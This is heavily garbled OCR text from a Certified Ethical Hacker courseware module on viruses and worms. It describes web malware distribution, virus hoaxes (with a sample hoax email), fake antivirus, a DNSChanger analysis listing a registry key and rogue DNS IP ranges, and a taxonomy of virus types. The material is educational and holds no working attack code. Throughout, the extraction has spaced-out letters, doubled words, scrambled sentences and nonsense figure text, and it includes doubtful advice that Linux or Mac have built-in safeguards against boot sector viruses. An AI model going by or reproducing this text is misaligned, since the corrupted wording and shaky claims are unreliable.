Exam Exam 312-50 Certified Ethical Hacker
C o m m o n T e c h n i q u e s U s e d to to D i s t ri ri b u te M a l w a r e o n t h e W e b
H
B l a c k h a t S e ar ar c h E n g i n e Optimization (SEO)
CEH
Malvertising
Ranking malware pages highly in search results
Embedding malware in ad-networks ad-networks that display across hundreds of legitimate, high-traffic high-traffic sites
Social Engineered Click-jacking
Compromised Legitimate Websites
Tricking users into clicking cli cking on innocent-looking webpages
Hosting Hosting embedded malw are that spreads to unsuspecting visitors
S p e a r p h i s h i n g S i t es es
Drive-by Downloads
Mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials
Exploiting flaws in browser software to install malware just by by visiting visiting a web page page
^ jl.
Source: Security Threat Report 2012 ( http://www.sophos.com http://www.sophos.com)) Copyright Copyright © by
^
Reproduction is Strictly Prohibit ed. EC-Cauactl.All Rights Reserved. Reproduction
C o m m o n T e c h n i q u e s U s e d t o D i s t r ib ib u t e M a l w a r e o n th e W eb
S o u rc rc e : S e c u r i t y T h r e a t R e p o r t 2 0 1 2 ( h t t p : / / w w w . s o p h o s . c o m )
Blackhat Search Engine Optimization (SEO): U s i n g t h i s t e c h n i q u e t h e a t t a c k e r r a n k s m a l w a r e pages high in search results
Social Engineered Click-jacking: T h e a t t a c k e r s t r i c k t h e u s e r s i n t o c l i c k i n g o n i n n o c e n t - l o o k i n g w e b p ag a g es es t h a t c o n t a i n m a l w a r e is t e c h n i q u e is u s e ed d f o r m i m i c k i n g l e g i t i m a t e i n s t i t u t i o n s , s u c h as a s b an an k s , Spearphishing Sites: T h is in an attempt to steal account login credentials
Malvertising: E m b e d s m a l w a r e i n a d n e t w o r k s t h a t d i s p l a y a c r o s s h u n d r e d s o f l e g i t i m a t e , h i g h traffic sites
Compromised Legitimate Websites: H o s t e m b e d d e d m a l w a r e t h a t s p r e a d s t o u n s u s p e c t i n g visitors s t a llll m a l w a r e j u s t b y Drive-by Drive-by Downloa ds: T h e a t t a c k e r e x p l o i t s f l a w s i n b r o w s e r s o f t w a r e t o i n st visiting a web page
Module 07 Page 1026
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Viru Virus s Hoaxes and an d Fake Antiviruses J
J
H o a xe xe s a r e f a l s e a l a r m s c l a im im i n g r e p o r t s
A t t a c k e r s d is is g u i s e m a l w a r e s a s a n a n t i v i ru ru s
about a non-ex isting virus which m ay
a n d t r i c k u s e r s t o in in s t a l l t h e m i n t h e i r
contain virus attachments
systems
W a r n i n g m e s s a ge ge s p r o p a g a t i n g t h a t a
O n c e i n s t a l le le d t h e s e f a k e a n t i v i r u s e s c a n
c e r t a in in e m a i l m e s s a g e s h o u l d n o t b e v ie ie w e d
damage targ et systems similar to other
and doing so w ill damage one's system
malwares
***
tif ifai* i*ft ft-F0RWAI1r)T )T14l'WA«NINflAM0Nn'RlFN0VtAMIIVANnrONTArn ntAsc rmv/Aflo mu wa rnin g among rniCNDS.rAMiiv and contacts Ho* •houMt* »k«t d*'•* tbv mat fmv Jwy v Co ikx cptn «1 « 1»yi i«im« « with 411etMchmvH vntlltvO>OSTCAAO'RO M •Uir. O ■ RtMONATION Of BARACK OBAMA . regjrdl«»l0f WhOsent IttO you It ISJ vlruStlWt Opers A Kttr tAftU lMAOt, t hen Dim* th«-whole run) Ca « ol YOU' computer. rih b lIvmNHM lWdil iuum nl UyCNNUni
1
Imk Hid) U••• I
jyMlllWA
l « HUM
1 4 j* j*for:h&
A WC
»—
(*•sifjctivtv jct ivtv irasawf iras awf Thevirw ...1 v«t erdiv. «ndthpp nortear ...1 .discoveredbvMcAfeev«terdiv.
1>tSeZeto Setloiof llie llodDiM., mIivictl.r viulxifoimatbonk«vL
jy j y y | r J ! ! L
w-
if srsr* •
l
:— = «= —
Reproduction is Strictly Prohibit ed. 0llicil. All Rights Reserved. Reproduction
Copyright Copyright © by EG-G
V i r u s H o a x e s a n d F a k e A n t iv i v i ru ru s e s V ir u s H o a x e s A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals s e n d t o c r e a t e h a v o c . I t i s f a i r l y c o m m o n f o r i n n o c e n t u s e r s t o p a s s t h e s ep ep h o n y messages along thinking they are helping others avoid the "virus." ©
Hoaxes are false alarms claim ing reports abou t non -existing viruses
©
T h e se se w a r n i n g m e s s ag a g e ss,, w h i c h c a n be b e p r o p a g a t e d r a p i d ly ly , s t a t in i n g t h a t ac e r t a i n
email
m e s s a ge ge s h o u l d n o t b e o p e n e d , a n d t h a t d o i n g s o w o u l d d a m a g e o n e ' s s y s te te m ©
I n s o m e c as as es es , t h e s e w a r n i n g m e s s a g es e s t h e m s e l v e s c o n t a i n v ir ir u s a t t a c h m e n t s
©
T h e se s e p os os s es es s t h e c a p a b i l it it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s t e m s
Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to b e s o m e w h a t o f an an e x p e r t t o s p r e ad ad h o a x e s i n o r d e r t o a v o i d b e i n g i d e n t i f i e d a n d c a u g h t . Therefore, it is a good practice to look for technical details about how to become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.
Module 07 Page 1027
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
T r y t o c r o s s c h e c k th t h e i d e n t i t y o f t h e p e r s o n w h o h as as p o s t e d t h e w a r n i n g . A l s o l o o k f o r m o r e i n f o r m a t i o n a b o u t t h e h o a x / w a r n i n g f r o m s e c o n d a ry ry s o ur u r c es es . B e f o re r e j u m p i n g t o c o n c l u s io io n s b y r e a d in in g c e r t a in i n d o c u m e n t s o n t h e I n t e r n e t , c h ec ec k t h e f o l l o w i n g : Q
I f i t is p o s t e d b y n e w s g r o u p s t h a t a re re s u s p ic ic i o u s , c ro ro s s c h e c k t h e i n f o r m a t i o n
with
a n o t h e r s o u rc rc e ©
I f t h e p e r s o n w h o h a s p o s t e d t h e n e w s is is n o t a k n o w n p e r s o n i n t h e c o m m u n i t y o r a n e x p e r t, t , c r o s sc s c h e ck ck t h e i n f o r m a t i o n w i t h a n o t h e r s o u rc rc e
0
I f a g o v e r n m e n t b o d y h as as p o s t e d t h e n e w s , t h e p o s t i n g s h o u ld l d a ls ls o ha ha v e a r e f e r e n c e t o the corresponding federal regulation
Q
O n e o f t h e m o s t e f f e c t i v e c he he c k s is is t o l o o k u p t h e s u s p e c t e d h o a x v i r u s b y n a m e o n antivirus software vendor sites
Q
I f t h e p o s t i n g is is t e c h n i c a l , h u n t f o r s i te te s t h a t w o u l d c a t e r t o t h e t e c h n i c a l i t i e s , a n d t r y t o a u t h e n t i c a t e t h e i n f o rm rm a t i o n Subject : FORWARD THIS WARNI NG AM ONG FRIENDS, FRIENDS, FAMILY AND CONTACTS ACTS PLEASE ASE FORWARD FORWARD THIS WARNI NG AMO NG FRIENDS, FRIENDS, FAMILY AND CONTACTS CONTACTSII You sho uld be aler t duri ng the next f ew days. Do not ope n any message message with an at tachm ent enti tled 'POSTCARD FROM BEJING BEJING or 'RESIGNATION OF 8ARACK 8ARACK OBAMA , regardless of wh o sent it t o you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destruct ive virus ever. The The virus was discovered by McAf ee yesterday, and there is no repair yet f or this kind of virus. This virus simply destroys the Zero Sector Sector of t he Hard Disc, Disc, where the vital informat ion is kept. COPYTHIS E MAIL, A ND SEND IT TO YOUR FRIENDS.REME FRIENDS.REMEMBER: MBER: IF YOU SEND IT TO TO THEM, YOU WILL BENEFIT ALL OF US. End-of-mail Thanks.
FIGURE 7.3: 7.3: Hoaxes Warning Message
F a k e A n t iv i r u s e s Fake antiviruses is a method of affecting a system by hackers and it can poison your s y s t e m a n d o u t b r e a k t h e r e g i s t r y a n d s y s t e m f ilil e s t o a l l o w t h e a t t a c k e r t o t a k e f u l l c o n t r o l a n d a cc c c es es s t o y o u r c o m p u t e r . I t a p p e a r s a nd n d p e r f o r m s s i m i l a r l y t o a r ea ea l a n t i v i r u s p r o g r a m . Fake antivirus programs first appear on different browsers and warn users that they have d i f f e r e n t s e c u r i t y t h r e a t s o n t h e i r s y s t e m , a n d t h i s m e s s a ge g e i s b a c k e d u p b y r e a l s u s p i c io io u s v i ru r u s e s . W h e n t h e u s e r t r i e s t o r e m o v e t h e v i r u s e s , t h e n t h e y a r e n a v i g a te t e d t o a n o t h e r p ag ag e where they need to buy or subscribe to that antivirus and proceed to payment details. These f a k e a n t i v i ru r u s p r o g r a m s a re re b e e n f a b r i c a t e d i n s u ch ch a w a y t h a t t h e y d r a w t h e a t t e n t i o n o f th th e unsuspecting user into installing the software. Some of the m ethod s used to extend the usa ag g e a nd n d i n s t a l l a t i o n o f f a k e a n t i v i ru ru s p r o g r a m s include: ©
E m a i l a n d m e s s a g i n g : A t t a c k e r s u s e s p a m e m a i l a n d so s o c ia ia l n e t w o r k i n g m e s s a ge ge s t o spread this type of infected email to users and probe the user to open the attachments for software installation.
Module 07 Page 1028
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Q
Exam 312-50 Certified Ethical Hacker
S ea ea rc r c h e n g i n e o p t i m i z a t io io n : A t t a c k e r s
generate pages related to public or current
search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus. Q
Compromised websites: Attackers secretly break into popular sites to install the fake
antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.
J a Protection
a
q
0,
'S( 'S (
-wacy
M
p«0M<1*©r» * # S4
Path
C \ w » C « C ^ S \ J N t 5 ^ c ^ « U J r ^ 4 i fV fV * g 0 a 5 7 2
Inlrctiom
35
I
I
SMtWI
FIGURE 7.4: Example of a Fake Antivirus
Module 07 Page 1029
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Virus Analysis: An alysis: DNSChanger DNSChanger (Alureon) modifies ifies the the DNS DNS settings setti ngs on the victim victim PC to divert Internet traffic traffic to malicious malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal personal financial information
CEH
J It acts as a bot an and can be organize ized in into a BotNet and controll controlled ed from from a remote remote location J It sprea reads thro throu ugh em emails, ils, so social ial engineering tricks, tricks, and untrusted untrusted downloads from the Inter Internet net
UHU $ DNSChanger malware achieves the DNS redirection redirecti on by modifying the following registry regist ry key settings settings against against a interface device such as as network card HK HKEY_LOCAL_MACHINE\SY \SYSTEM\Curre rrentContro trol Set\Services\Tcpip\Param Set\Services\Tcpip\Parameters\lnterfaces\%Ra eters\lnterfaces\%Ra ndom CLSID%NameServer
t
J DNSChanger has rec receive ived sign ignific ifica ant attention attention due to the large l arge number of affected systems worldwide andthe fact that as part of the BotNet BotNet takedown the FBI took ownership ownership of the rogue DNSservers servers to ensure those affect affected ed did not immediately lose the abili ability ty to resolv resolve e DNS names h ttp://www. ttp:// www. totaldefense. com com
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
V i r u s A n a l y s is is : D N S C h a n g e r Source: h t t p : / / w w w . t o t a l d e f e n s e . c o m DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and c o n t r o l l e d f r o m a r e m o t e l o c a t i o n . Th Th i s m a l w a r e a c h i e v e s D N S r e d i r e c t i o n b y m o d i f y i n g t h e s y s t e m r e g i s t ry ry k e y s e t t i ng n g s a g a i n s t an an i n t e r f a c e d e v i c e s uc u c h as as n e t w o r k c a r d . DNSChanger has received significant attention due to the large number of affected systems w o r l d w i d e a n d t h e f a c t t h a t a s p a r t o f t h e b o t n e t t a k e d o w n , t h e FBI t o o k o w n e r s h i p o f r o g u e DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. This can even modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.
Module 07 Page 1030
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Virus Analysis: An alysis: DNSChanger (Cont’d)
The rogue DNS servers can exist in any of the following ranges: L
DNSChanger
64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255 77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
DNSChanger sniffs the credential and redirects the request to real website Real Website ww.xrecyritY-tP1 IP: 200.0.0.45
DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2 64.28.176.2
Attac ker runs DNSServer in Russia (IP: 64.28.176.2)
http://www. ttp: //www. tota!defense, !defense,com
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
tout V i r u s A n a l y s is i s : D N S C h a n g e r ( C o n t ’d ’d ) ’
Source: h t t p : / / w w w . t o t a l d e f e n s e . c o m
T h e r o g u e D NS NS s e r v e rs rs c a n e x is is t i n a n y o f t h e f o l l o w i n g r a n g e s: s:
64.28.176.0 - 64.28.191.255, 67.210.0.0
67.210.15.255
77.67.83.0 - 77.67.83.255 , 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
Module 07 Page 1031
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Whal is the IP address of ww w. *security. corn corn
©
>
DNSChanger sniffs the credential and redirects the request to real website
Fake Website IP: 65.0.0.2
» Real Website wvAv.xsecuritv.com IP: 200.0.0.45
©
DNS Request do to 64.28.176.2
> DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2
© Attacker runs DNS Server in Russia (IP: 64.28.176.2)
FIGURE 7.5: Virus Analysis Using DNSChanger
T o i n f e c t t h e s y s t e m a n d s t e a l c r e d e n t i a l s , t h e a t t a c k e r h as as t o f i r s t r u n D NS NS s e r v e r . H e r e t h e attacker runs his or her DNSserver in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to: 64.28.176.2. When this m a l w a r e h as as i n f e c t e d t h e s y s t e m , i t e n t i r e l y c h a n g e s t h e D NS NS s e tt tt i n g s o f t h e i n f e c t e d m a c h i n e and forces all the DNS request to go to the DNSserver run by the attacker. After altering the s e t t i n g o f t h e D NS NS , a n y r e q u e s t t h a t i s m a d e b y t h e s y s t e m i s s e n t t o t h e m a l i c i o u s D N S s e r v e r. r. Here,
the
victim
sent
DNS
Request
what is the IP address of www.xsecurity.com
to
( 6 4 . 2 8 . 1 7 6 . 2 ) . T h e a t t a c k e r g a v e a r e s p o n s e t o t h e r e q u e s t a s w w w . x s e c u r i t v . c o m . which is l o c a t e d a t 6 5 . 0 .0 .0 . 2 . W h e n v i c t i m ' s b r o w s e r c o n n e c t s t o 6 5 . 0 .0 .0 . 2 , i t r e d i re re c t s h i m o r h e r t o a f a k e w e b s i t e c r e a t e d b y th t h e a t t a c k e r w i t h I P: 6 5 .0 .0 . 0 . 2. 2 . D N S C h a n ge g e r sn s n i ff ff s t h e c r e d e n t i a l ( u s e err n a m e , p a s s w o r d s ) a n d r e d i r e c t s t h e r e q u e s t t o r e al al w e b s i t e (w (w w w . x s e c u r i t y . c o m ) with IP: 200.0.0.45.
Mo dule 07 Page Page 1032
Ethical Hacking and Coun termea sures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
M odule Flow Flow
CEH
Virus and Worms Concepts
Computer Worms
Penetration Testing
Counter• measures
Malware A n al y s i s
Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.
■ = || M o d u l e F l o w P r i o r t o t h i s , w e h a v e d is is c u ss s s e d a b o u t v i ru ru s e s a n d w o r m s . N o w w e w i l l d is is c us us s a b o u t d i f f e r e n t t y p e s o f v ir ir u s e ess .
X
V ir ir u s a n d W o r m s C o n c e p t
i•
y
—
v —
C
M a l w a r e A n al a l y si si s
Types of Viruses
Com puter Worms
Countermeasures
^
)
P e n e t r a t i o n T e s t in in g
T h is is s e c t i o n d e s c r i be b e s a b o u t d i f f e r e n t t y p e s o f V ir ir u s e ess .
Module 07 Page 1033
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
System or Boot Sector Viruses
Exam 312-50 Certified Ethical Hacker
Stealth Virus/ Tunneling Virus
Encryption
Polymorphic
Metamorphic
Sparse Infector Virus
Cluster Viruses
Direct Action or Transient
Multipartite
T y p e s o f V i ru ru s e s So far, we have discussed various virus and worm concepts. Now we will discuss v a r i o u s t y p e s o f v i r us us e s . T h is is s e c t i o n h i g h l i g h t s v a r io io u s t y p e s o f v ir ir u s e s a n d w o r m s s u c h as as fifi l e a n d m u l t i p a r t i t e v i r u s e s , macro
viruses,
cluster
viruses,
stealth/tunneling
viruses,
encryption
viruses,
metamorphic
viruses, shell viruses, and so on. Computer viruses are the malicious software programs written b y a tt t t a c k e rs rs t o i n t e n t i o n a l l y e n t e r th t h e t a r g e t e d s y s te t e m w i t h o u t t h e u s e r ' s p e r m i s s i o n . As As a r e su s u l t, t, t h e y a f f e c t t h e s e c u r i t y sy s y s t em e m a n d p e r f o r m a n c e o f t h e m a c h i n e . A f e w o f tth he most common types of computer viruses that adversely affect security systems are discussed in d e t a i l o n t h e f o l l o w i n g s lili de d e s. s.
T y p e s o f V i ru ru s e s V i ru ru s e s a r e c la l a s s if if i ed e d d e p e n d i n g o n t w o c a t e g o r ie ie s : Q
W h a t D o T h e y I n f e c t? t?
©
H o w Do Do T h e y I n f e c t ?
Module 07 Page 1034
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W hat Do Do They Infe Infe ct? System or Boot Boot Sector Viruses _
f*.
T h e m o s t c o m m o n t a r g e t s f o r a v i r u s a r e t h e s y s t e m s e c t or or s , w h i c h a r e n o t h i n g b u t
the Master Boot Record and the DOS Boot Record System sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They s p e c i a llll y i n f e c t t h e f l o p p y b o o t s e c t o r s a n d r e c o r d s o f t h e h a r d d is is k . F o r e x a m p l e : D is is k K ilil le le r and Stone virus.
File Viruses Executable files are infected by file viruses, as they insert their code int o the original file and get executed. File viruses are larger in number, but they are not the most commonly fou nd . They infec t in a va riety of ways and can be fou nd in a large num be r of file types.
M ultipartite ultipartite Virus T h e y i n f e c t p r o g r a m f i le le s , a n d t h is is f i le le i n t u r n a f f e c t s t h e b o o t s e c t o r s s uc u c h as a s I n v a d er er , Flip, and Tequila.
C luster Viruses Viruses C l u s t e r v i ru ru s e s i n f e c t f i le l e s w i t h o u t c h a n g i n g t h e f i l e o r p l a n t i n g e x t r a f i le le s ; t h e y c h a n g e t h e D OS OS d i r e c t o r y i n f o r m a t i o n s o t h a t e n t r i e s p o i n t t o t h e v i r u s c o d e i n s t e ad ad o f t h e a c t u a l program.
M acro Virus Virus M i c r o s o f t W o r d o r a s i m i la l a r a p p lil i c a t io io n c a n b e i nf n f e c t e d t h r o u g h a c o m p u t e r v ir ir u s c a llll e d a m a c r o v i r us u s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c t io io n s w h e n t h e a p p l i c a t i o n i s t r i g g e r e d o r s o m e t h i n g e ls ls e . M a c r o v i r u s es e s a r e s o m e w h a t l e ss ss h a r m f u l t h a n o t h e r types. They are usually spread via an email.
How Do Do They Infect? ■
Stealth V iruses T h e s e v i ru ru s e s t r y t o h i d e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e l y a l t e r i n g a n d
corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over p o r t i o n s o f t h e t a r g e t s y s t e m a n d h i d e s i ts ts v i r u s c o d e . Life :
Tu nneling Viruses Viruses T h es e s e v ir ir u s e s t ra r a c e t h e s t ep e p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s te te m
r e q u e s t s s o t h a t t h e y g e t i n t o B IO IO S a n d D OS OS t o i n s t a llll t h e m s e l v e s . T o p e r f o r m t h i s a c t i v it it y , t h e y e v en e n t u n n e l u n d e r a n t i v ir i r u s s o f t w a r e p r o gr gr a m s .
Mo dule 07 Page Page 1035
Ethical Hacking and Coun termea sures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
\
Exam Exam 312-50 Certified Ethical Hacker
Enc ryption ryption V iruses iruses
c_ —
T h is is t y p e o f v i r u s c o n s is i s t s o f an an e n c r y p t e d c o p y o f t h e v i ru r u s a nd nd a d e c r y p t i o n m o d u l e .
T h e d e c r y p t i n g m o d u l e r e m a i n s c o n s t a n t , w h e r e a s t h e d i f f e r e n t k ey e y s ar ar e u se se d f o r e n c r y p t i o n .
iri) ,
Polymorphic Viruses These viruses were developed to confuse antivirus programs that scan for viruses in
the system. It is difficult to trace them, since they change their characteristics each time they i n f e c t , e .g .g ..,, e v e r y c o p y o f th th i s v i ru ru s d i f f e r s f r o m i ts ts p r e v i o u s o n e . V i r u s d e v e l o p e r s h a v e e v e n c r e a t e d m e t a m o r p h i c e n g i ne n e s a n d v ir i r u s w r i t i n g t o o l k i ts ts t h a t m a k e t h e c o d e o f an a n e x i s ti t i n g v i ru ru s look different from others of its kind.
M e t a m o r p h i c V i r u se se s A code that can reprogram itself is called metamorphic code. This code is translated i n t o t h e t e m p o r a r y c o d e , an a n d t h e n c o n v e r t e d b a cckk t o t h e n o r m a l c o de d e . T hi hi s t e c h n i q u e , i n w h ic ic h t h e o r i g i n a l a l g o r i t h m r e m a i n s i n t a c t , is is u s e ed d t o a v o i d p a t t e r n r e c o g n i t i o n o f a n t iv iv i r u s s o f t w a r e . T h is is is is m o r e e f f e c t i v e i n c o m p a r i s o n t o p o l y m o r p h i c c o d e . T h is is t y p e o f v i ru r u s c o n s is is t s o f c o m p l e x extensive code.
O verw riting riting File or Cavity V iruses S o m e p r o g r a m f i le le s h a v e a r ea ea s o f e m p t y s p ac ac e . T h is is e m p t y s p a c e is is t h e m a i n t a r g e t o f these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the o r i g i n a l c o d e . I t i n s t a l l s i t s e l f i n t h e f i l e i t a tt e m p t s t o i n f e c t .
Sparse Infector Viruses
a®
A s p ar ar s e i n f e c t o r v ir i r u s i n f e c t s o n l y o c c a s i o n a l l y ( e .g .g ..,, e v e r y t e n t h p r o g r a m e x e c u t e d )
o r o n l y f ilil e s w h o s e l e n g t h s f al al l w i t h i n a n a r r o w r a n ge ge .
C o m p a n i o n V i r us us e s T h e c o m p a n i o n v i r u s s t o r e s it it s e l f b y h a v in in g t h e i d e n t i c a l f i l e n a m e a s t h e t a r g e t e d p r o g r a m f i le le . A s s o o n a s t h a t f i le l e is e x e c u t e d , t h e v i r u s i n f e c ts ts t h e c o m p u t e r , a n d h a r d d i s k d a ta ta is modified.
C a m o u f la la g e V i r us us e s
^ W
-------
-
They disguise them selve s as genu ine applications
of the user. These viruses are not
difficult to find since antivirus programs have advanced to the point where such viruses are e a s i ly ly t r a c e d .
Shell Viruses ____ _ ____
T h is is v i r u s c o d e f o r m s a l a y e r a r o u n d t h e t a r g e t h o s t p r o g r a m ' s c o d e t h a t c a n be be
Module 07 Page 1036
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
c o m p a r e d t o a n " e g g s h e l l / m a k i n g i t s e l f t h e o r i g i n a l p r o g r a m a n d t h e h o s t c o d e it i t s s ub ub routine. Here e,, t h e o r i g i n a l c o d e i s m o v e d t o a n e w l o c a t i o n b y t h e v i r u s c o d e a n d t h e v i r u s a s s u m e s i ts ts i d e n t i t y .
File Extension Viruses F.
F ilil e e x t e n s i o n v i r u s e s c h a n g e t h e e x t e n s i o n s o f f ilil e s ; . T XT XT is is s a f e, e, a s i t i n d i c a t e s a p u r e
t e x t ffii l e. e. I f y o u r c o m p u t e r ' s f i l e e x t e n s i o n s v i e w is t u r n e d o f f a n d s o m e o n e s e n d s y o u a f i le le named BAD.TXT.VBS, you will see only BAD.TXT.
>'« f| Add -on V iruses M o s t v i r u s e s ar ar e a d d - o n v i r u s es e s . T h is is t y p e o f v ir ir u s a p p e n d s i ts ts c o d e t o t h e b e g i n n i n g o f t h e h o s t c o d e w i t h o u t m a k i n g a n y c h a n g es es t o th t h e l a t t e r . T h u s, s, t h e v ir ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d p l ac ac e s i t s e lf l f in in i ts ts p l ac ac e , b u t i t d o e s n o t t o u c h t h e h o s t c o d e . However, the virus code is executed before the host code. The only indication that the file is c o r r u p t e d i s t h a t t h e s iz iz e o f t h e f i l e h a s in in c r e a s e d .
Intrusive V iruses iruses T h is is f o r m o f v i ru ru s o v e r w r i t e s itit s c o d e e i t h e r by b y c o m p l e t e l y re r e m o v i n g t h e t a r g e t h os o s t 's 's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.
Direct Action Action or T ransient V iruses iruses Transfers all controls to the host code where it resides, selects the target program to be modified, and corrupts it.
=—
T erm inate an d Stay Stay R esiden t V iruses (TSRs TSRs))
ffr
A T SR SR v i r u s r e m a i n s p e r m a n e n t l y i n m e m o r y d u r i n g t h e e n t i r e w o r k s e ss s s i on on , e v e n
a f t e r t h e t a r g e t h o s t p r o g r a m i s e x e c u t e d a n d t e r m i n a t e d . I t c an an b e r e m o v e d o n l y b y r e b o o t i n g the system.
Module 07 Page 1037
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Syste Sy stem m or Boot Sector V iru ir u ses se s Boot Sector Virus Boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR
CEH
Execution
©
o
When system boots, virus code is executed first and then control is passed passed to original MBR
Before Infection
A f t e r I n f e ct ct i o n
Virus Code
MBR Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
S y s t e m o r B oo oo t S e c t o r V i r u s e s m
S y s t e m s e c t o r v ir ir u s e s ca ca n b e d e f i n e d a s t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e
d is is k , r a t h e r t h a n t h e b o o t s e c t o r v ir i r u s t h a t a f f e c t s t h e D OS OS b o o t s e c t o r o f th th e d is is k . A n y s y s t e m is divided into areas, called sectors, where the programs are stored. T h e t w o t y p e s o f s y s t e m s e c t o r s ar ar e : Q
M B R ( M a s t e r B o o t R ec ec o r d )
MBRs are the m ost virus-p rone zone ess b e c a u s e i f t h e M B R i s c o r r u p t e d , a l l d a t a w i l l b e lost. 0
D B R ( D OS OS B o o t R e c o r d )
T h e D O S b o o t s e c t o r is is e x e c u t e d w h e n e v e r t h e s y s t e m i s b o o t e d . T h is is is is t h e c r u c i a l p o i n t o f a t t a c k f o r v i ru r u s es es . T h e s y s t e m s e c t o r c o n s is is t s o f 5 1 2 b y t e s o f m e m o r y . B e ca ca u sse e o f t h i s , s y s te t e m s e c t o r v i ru ru s e s conceal their code in some other disk space. The main carrier of system sector viruses is the f l o p p y d i sk sk . T h es es e v i r u s e s g e n e r a l l y r e s i d e i n t h e m e m o r y . T h e y c a n a l so so b e c a u s e d b y T r o ja ja n s . S o m e s e c t o r v ir i r u s e s al al s o s p r e a d t h r o u g h i n f e c t e d f i le l e s , a nd n d t h e y a r e ca c a l le le d m u l t i p a r t v i r u s e s .
Module 07 Page 1038
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
1
Exam 312-50 Certified Ethical Hacker
Virus Virus Rem oval System sector viruses are designed to create the illusion that there is no virus on the s y s t e m . O n e w a y t o d e a l w i t h t h i s v ir ir u s is is t o a v o i d t h e u s e o f t h e W i n d o w s o p e r a t i n g
system, and switch to Linux or Macs, because Windows is more prone to these attacks. Linux and Macintosh have a built-in safeguard to protect against these viruses. The other way is to carry out antivirus checks on a periodic basis. Before Infection
G After Infection V
O Virus Code
FIGURE 7.6: System or Boot Sector Viruses
Module 07 Page 1039
